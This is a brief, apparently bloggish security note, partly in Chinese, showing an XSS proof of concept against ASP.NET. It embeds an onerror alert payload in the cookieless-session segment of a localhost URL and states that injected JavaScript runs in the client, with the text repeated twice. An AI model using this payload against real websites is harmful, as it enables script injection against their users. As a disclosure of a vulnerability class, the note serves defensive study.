All is XSS that comes to the .NET
通杀.NET的XSS!
https://localhost:44345/(A(%22onerror=%22alert%601%60%22))/xss.aspx
(A("onerror="alert`1`"))
在asp.net的url中嵌入一段,然后这段js会被执行。
最坏的情况,可以直接注入一段js到客户端
https://localhost:44345/(A(%22onerror=%22alert%601%60%22))/xss.aspx
(A("onerror="alert`1`"))
在asp.net的url中嵌入一段,然后这段js会被执行。
最坏的情况,可以直接注入一段js到客户端